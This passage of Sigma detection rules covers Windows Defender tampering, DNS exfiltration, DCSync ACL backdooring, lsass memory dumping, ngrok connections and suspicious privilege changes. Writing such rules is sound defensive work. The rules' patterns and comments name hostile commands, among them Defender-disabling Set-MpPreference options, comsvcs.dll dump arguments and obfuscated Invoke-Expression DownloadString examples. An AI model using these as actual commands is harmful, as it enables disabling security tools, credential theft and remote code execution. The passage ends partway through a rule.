title: Powershell Base64 Encoded MpPreference Cmdlet
id: c6fb44c6-71f5-49e6-9462-1425d328aee3
status: test
description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
references:
    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2023-01-30
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|base64offset|contains:
              - 'Add-MpPreference '
              - 'Set-MpPreference '
              - 'add-mppreference '
              - 'set-mppreference '
        - CommandLine|contains:
              # UTF16-LE
              - 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Powershell DNSExfiltration
id: d59d7842-9a21-4bc6-ba98-64bfe0091355
status: test
description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh
    - https://github.com/Arno0x/DNSExfiltrator
author: frack113
date: 2022-01-07
tags:
    - attack.exfiltration
    - attack.t1048
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmdlet:
        - ScriptBlockText|contains: 'Invoke-DNSExfiltrator'
        - ScriptBlockText|contains|all:
              - ' -i '
              - ' -d '
              - ' -p '
              - ' -doh '
              - ' -t '
    condition: selection_cmdlet
falsepositives:
    - Legitimate script
level: high

title: Powershell Defender Disable Scan Feature
id: 1ec65a5f-9473-4f12-97da-622044d6df21
status: test
description: Detects requests to disable Microsoft Defender features using PowerShell commands
references:
    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
    - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
    - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
author: Florian Roth (Nextron Systems)
date: 2022-03-03
modified: 2024-01-02
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli_cmdlet:
        CommandLine|contains:
            - 'Add-MpPreference '
            - 'Set-MpPreference '
    selection_cli_option:
        CommandLine|contains:
            - 'DisableArchiveScanning '
            - 'DisableRealtimeMonitoring '
            - 'DisableIOAVProtection '
            - 'DisableBehaviorMonitoring '
            - 'DisableBlockAtFirstSeen '
            - 'DisableCatchupFullScan '
            - 'DisableCatchupQuickScan '
    selection_cli_value:
        CommandLine|contains:
            - '$true'
            - ' 1 '
    selection_encoded_modifier:
        CommandLine|base64offset|contains:
            # Note: Since this is calculating offsets casing is important
            - 'disablearchivescanning '
            - 'DisableArchiveScanning '
            - 'disablebehaviormonitoring '
            - 'DisableBehaviorMonitoring '
            - 'disableblockatfirstseen '
            - 'DisableBlockAtFirstSeen '
            - 'disablecatchupfullscan '
            - 'DisableCatchupFullScan '
            - 'disablecatchupquickscan '
            - 'DisableCatchupQuickScan '
            - 'disableioavprotection '
            - 'DisableIOAVProtection '
            - 'disablerealtimemonitoring '
            - 'DisableRealtimeMonitoring '
    selection_encoded_direct:
        CommandLine|contains:
            - 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
            - 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'
            - 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'
            - 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'
            - 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'
            - 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'
            - 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
            - 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'
            - 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'
            - 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'
            - 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'
            - 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'
            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'
            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'
            - 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'
    condition: all of selection_cli_* or 1 of selection_encoded_*
falsepositives:
    - Possible administrative activity
    - Other Cmdlets that may use the same parameters
level: high

title: Powershell Install a DLL in System Directory
id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd
status: test
description: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-27
modified: 2024-01-22
tags:
    - attack.persistence
    - attack.credential-access
    - attack.defense-impairment
    - attack.t1556.002
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|re: '(Copy-Item|cpi) .{2,128} -Destination .{1,32}\\Windows\\(System32|SysWOW64)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Powershell Token Obfuscation - Process Creation
id: deb9b646-a508-44ee-b7c9-d8965921c6b6
related:
    - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51
      type: similar
status: test
description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
references:
    - https://github.com/danielbohannon/Invoke-Obfuscation
author: frack113
date: 2022-12-27
modified: 2026-03-16
tags:
    - attack.stealth
    - attack.t1027.009
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Examples:
        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString
        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString
        #   &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString
        - CommandLine|re: '\w+`(?:\w+|-|.)`[\w+|\s]'
        # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme
        - CommandLine|re: '"(?:\{\d\})+"\s*-f'
        #   ${e`Nv:pATh}
        - CommandLine|re: '(?i)\$\{`?e`?n`?v`?:`?p`?a`?t`?h`?\}'
    filter_main_envpath:
        CommandLine|contains: '${env:path}'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

title: Powerview Add-DomainObjectAcl DCSync AD Extend Right
id: 2c99737c-585d-4431-b61a-c911d86ff32f
status: test
description: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
references:
    - https://twitter.com/menasec1/status/1111556090137903104
    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
author: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat
date: 2019-04-03
modified: 2022-08-16
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
    definition: 'Requirements: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)'
detection:
    selection:
        EventID: 5136
        AttributeLDAPDisplayName: 'ntSecurityDescriptor'
        AttributeValue|contains:
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
            - '89e95b76-444d-4c62-991a-0facbeda640c'
    filter_main_dns_object_class:
        ObjectClass:
            - 'dnsNode'
            - 'dnsZoneScope'
            - 'dnsZone'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account.
level: high

title: Prefetch File Deleted
id: 0a1f9d29-6465-4776-b091-7f43b26e4c89
status: test
description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
references:
    - Internal Research
    - https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
author: Cedric MAURUGEON
date: 2021-09-29
modified: 2024-01-25
tags:
    - attack.stealth
    - attack.t1070.004
logsource:
    product: windows
    category: file_delete
detection:
    selection:
        TargetFilename|contains: ':\Windows\Prefetch\'
        TargetFilename|endswith: '.pf'
    filter_main_svchost:
        Image|endswith: ':\windows\system32\svchost.exe'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

title: Primary Refresh Token Access Attempt
id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
status: test
description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1528
    - attack.credential-access
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'attemptedPrtAccess'
    condition: selection
falsepositives:
    - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.
level: high

title: PrintBrm ZIP Creation of Extraction
id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
status: test
description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
author: frack113
date: 2022-05-02
tags:
    - attack.command-and-control
    - attack.stealth
    - attack.t1105
    - attack.t1564.004
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\PrintBrm.exe'
        CommandLine|contains|all:
            - ' -f'
            - '.zip'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Privilege Escalation via Named Pipe Impersonation
id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b
related:
    - id: f35c5d71-b489-4e22-a115-f003df287317
      type: derived
status: test
description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
references:
    - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
modified: 2022-12-30
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection_name:
        - Image|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'PowerShell.EXE'
    selection_args:
        CommandLine|contains|all:
            - 'echo'
            - '>'
            - '\\\\.\\pipe\\'
    condition: all of selection*
falsepositives:
    - Other programs that cause these patterns (please report)
level: high

title: Privilege Role Elevation Not Occuring on SAW or PAW
id: 38a5e67b-436a-4e77-9f73-f48a82626890
status: test
description: Detects failed sign-in from a PAW or SAW device
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You have to tune the rule for your environment before use it
    selection:
        properties.message|contains: Add memmber to role completed (PIM aciviation)
        # Countries you DO operate out of e,g GB, use list for mulitple
        Location|expand: '%LegitCountries%'
        IPaddress|expand: '%UnApprovedIp%'
        # unapproved browser, operating system
        DeviceInfo|expand: '%UnApprovedDevice%'
        DeviceDetail.isCompliant: 'false'
        Status:
            - Sucess
            - failure
    condition: selection
falsepositives:
    - Not using a PAW/SAW in the environment
level: high

title: Privilege Role Sign-In Outside Expected Controls
id: cf1e5687-84e1-41af-97a9-158094efef53
status: test
description: Detects failed sign-in due to user not meeting expected controls for adminitrators
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.initial-access
    - attack.persistence
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You have to tune the rule for your environment before use it
    selection:
        Status: failure
        # Countries you do NOT operate out of e,g GB, use list for mulitple
        Location|expand: '%UnLegitCountries%'
        IPaddress|expand: '%UnApprovedIp%'
        # unapproved browser, operating system
        DeviceInfo|expand: '%UnApprovedDevice%'
    condition: selection
falsepositives:
    - A legit admin not following proper processes
level: high

title: Privilege Role Sign-In Outside Of Normal Hours
id: e927a2f5-e7af-424f-ace7-70ebb49e8976
status: test
description: Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.persistence
    - attack.initial-access
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You need to tune the rule for your enrivonnement before use
    selection:
        Status: Sucess
        # Countries you DO operate out of e,g GB, use list for mulitple
        Location|expand: '%LegitCountries%'
        # outside normal working hours
        Date|expand: '%ClosingTime%'
        Initiatied.By|expand: '%ApprovedUserUpn%'
    condition: selection
falsepositives:
    - An admin doing actual work outside of normal business hours
level: high

title: Privileged User Has Been Created
id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e
status: test
description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
references:
    - https://digital.nhs.uk/cyber-alerts/2018/cc-2825
    - https://linux.die.net/man/8/useradd
    - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
author: Pawel Mazur
date: 2022-12-21
modified: 2025-01-21
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    product: linux
    definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work'
detection:
    # Example of the events that could be observed when matching these would be as follow
    #   Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash
    #   Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash
    #   Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash
    #   Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash
    selection_new_user:
        - 'new user'
    selection_uids_gids:
        - 'GID=0,' # root group
        - 'UID=0,' # root UID
        - 'GID=10,' # wheel group
        - 'GID=27,' # sudo group
    condition: all of selection_*
falsepositives:
    - Administrative activity
level: high

title: Process Access via TrolleyExpress Exclusion
id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6
status: test
description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
references:
    - https://twitter.com/_xpn_/status/1491557187168178176
    - https://www.youtube.com/watch?v=Ie831jF0bb0
author: Florian Roth (Nextron Systems)
date: 2022-02-10
modified: 2022-05-13
tags:
    - attack.stealth
    - attack.t1218.011
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
      # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter
            - '\TrolleyExpress 7'
            - '\TrolleyExpress 8'
            - '\TrolleyExpress 9'
            - '\TrolleyExpress.exe 7'
            - '\TrolleyExpress.exe 8'
            - '\TrolleyExpress.exe 9'
      # Common dumpers
            - '\TrolleyExpress.exe -ma '
    renamed:
        Image|endswith: '\TrolleyExpress.exe'
    filter_renamed:
        OriginalFileName|contains: 'CtxInstall'
    filter_empty:
        OriginalFileName: null
    condition: selection or ( renamed and not 1 of filter* )
falsepositives:
    - Unknown
level: high

title: Process Execution Error In JVM Based Application
id: d65f37da-a26a-48f8-8159-3dde96680ad2
status: test
description: Detects process execution related exceptions in JVM based apps, often relates to RCE
references:
    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
    - attack.initial-access
    - attack.t1190
logsource:
    category: application
    product: jvm
    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
    keywords:
        - 'Cannot run program'
        - 'java.lang.ProcessImpl'
        - 'java.lang.ProcessBuilder'
    condition: keywords
falsepositives:
    - Application bugs
level: high

title: Process Execution From A Potentially Suspicious Folder
id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
status: test
description: Detects a potentially suspicious execution from an uncommon folder.
references:
    - https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt
    - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
    - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-01-16
modified: 2024-07-12
tags:
    - attack.stealth
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|contains:
            - ':\Perflogs\'
            - ':\Users\All Users\'
            - ':\Users\Default\'
            - ':\Users\NetworkService\'
            - ':\Windows\addins\'
            - ':\Windows\debug\'
            - ':\Windows\Fonts\'
            - ':\Windows\Help\'
            - ':\Windows\IME\'
            - ':\Windows\Media\'
            - ':\Windows\repair\'
            - ':\Windows\security\'
            - ':\Windows\System32\Tasks\'
            - ':\Windows\Tasks\'
            - '$Recycle.bin'
            - '\config\systemprofile\'
            - '\Intel\Logs\'
            - '\RSA\MachineKeys\'
    filter_optional_ibm:
        Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\'
    filter_optional_citrix:
        Image|startswith: 'C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\'
        Image|endswith: '\CitrixReceiverUpdater.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

title: Process Explorer Driver Creation By Non-Sysinternals Binary
id: de46c52b-0bf8-4936-a327-aace94f94ac6
status: test
description: |
    Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
    Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
    - https://github.com/Yaxser/Backstab
    - https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
    - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
author: Florian Roth (Nextron Systems)
date: 2023-05-05
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1068
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\PROCEXP'
        TargetFilename|endswith: '.sys'
    filter_main_process_explorer:
        Image|endswith:
            - '\procexp.exe'
            - '\procexp64.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some false positives may occur with legitimate renamed process explorer binaries
level: high

title: Process Initiated Network Connection To Ngrok Domain
id: 18249279-932f-45e2-b37a-8925f2597670
related:
    - id: 1d08ac94-400d-4469-a82f-daee9a908849
      type: similar
status: test
description: |
    Detects an executable initiating a network connection to "ngrok" domains.
    Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
    While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
references:
    - https://ngrok.com/
    - https://ngrok.com/blog-post/new-ngrok-domains
    - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/
    - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf
author: Florian Roth (Nextron Systems)
date: 2022-07-16
modified: 2025-07-30
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1567
    - attack.t1572
    - attack.t1102
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|endswith:
            - '.ngrok-free.app'
            - '.ngrok-free.dev'
            - '.ngrok.app'
            - '.ngrok.dev'
            - '.ngrok.io'
    condition: selection
falsepositives:
    - Legitimate use of the ngrok service.
# Note: The level of this rule is related to your internal policy.
level: high

title: Process Memory Dump Via Comsvcs.DLL
id: 646ea171-dded-4578-8a4d-65e9822892e3
related:
    - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c
      type: obsolete
status: test
description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
references:
    - https://twitter.com/shantanukhande/status/1229348874298388484
    - https://twitter.com/pythonresponder/status/1385064506049630211?s=21
    - https://twitter.com/Hexacorn/status/1224848930795552769
    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
    - https://twitter.com/SBousseaden/status/1167417096374050817
    - https://twitter.com/Wietze/status/1542107456507203586
    - https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py
    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s
author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2020-02-18
modified: 2025-02-23
tags:
    - attack.credential-access
    - attack.stealth
    - attack.t1036
    - attack.t1003.001
    - car.2013-05-009
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
        - CommandLine|contains: 'rundll32'
    selection_cli_1:
        CommandLine|contains|all:
            - 'comsvcs'
            - 'full'
        CommandLine|contains:
            - '#-'
            - '#+'
            - '#24'
            - '24 '
            - 'MiniDump' # Matches MiniDump and MinidumpW
            - '#65560' # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.  for e.g ordinal 24 can be also represented by 65560 (65536+24)
    selection_generic:
        CommandLine|contains|all:
            - '24'
            - 'comsvcs'
            - 'full'
        CommandLine|contains:
            - ' #'
            - ',#'
            - ', #'
            - '"#'
    condition: (selection_img and 1 of selection_cli_*) or selection_generic
falsepositives:
    - Unlikely
level: high

title: Process Memory Dump via RdrLeakDiag.EXE
id: edadb1e5-5919-4e4c-8462-a9e643b02c4b
related:
    - id: 6355a919-2e97-4285-a673-74645566340d
      type: obsolete
status: test
description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
references:
    - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
    - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/
    - https://twitter.com/0gtweet/status/1299071304805560321?s=21
    - https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive
author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
date: 2021-09-24
modified: 2024-08-15
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rdrleakdiag.exe'
        - OriginalFileName: RdrLeakDiag.exe
    selection_cli_dump:
        CommandLine|contains|windash:
            - '/memdmp'
            - 'fullmemdmp'
    selection_cli_output_process:
        CommandLine|contains|windash:
            - ' /o ' # Output
            - ' /p ' # Process
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high

title: ProcessHacker Privilege Elevation
id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9
status: test
description: Detects a ProcessHacker tool that elevated privileges to a very high level
references:
    - https://twitter.com/1kwpeter/status/1397816101455765504
author: Florian Roth (Nextron Systems)
date: 2021-05-27
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.t1543.003
    - attack.t1569.002
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName|startswith: 'ProcessHacker'
        AccountName: 'LocalSystem'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Protected Storage Service Access
id: 45545954-4016-43c6-855e-eae8f1c369dc
status: test
description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
references:
    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-10
modified: 2021-11-27
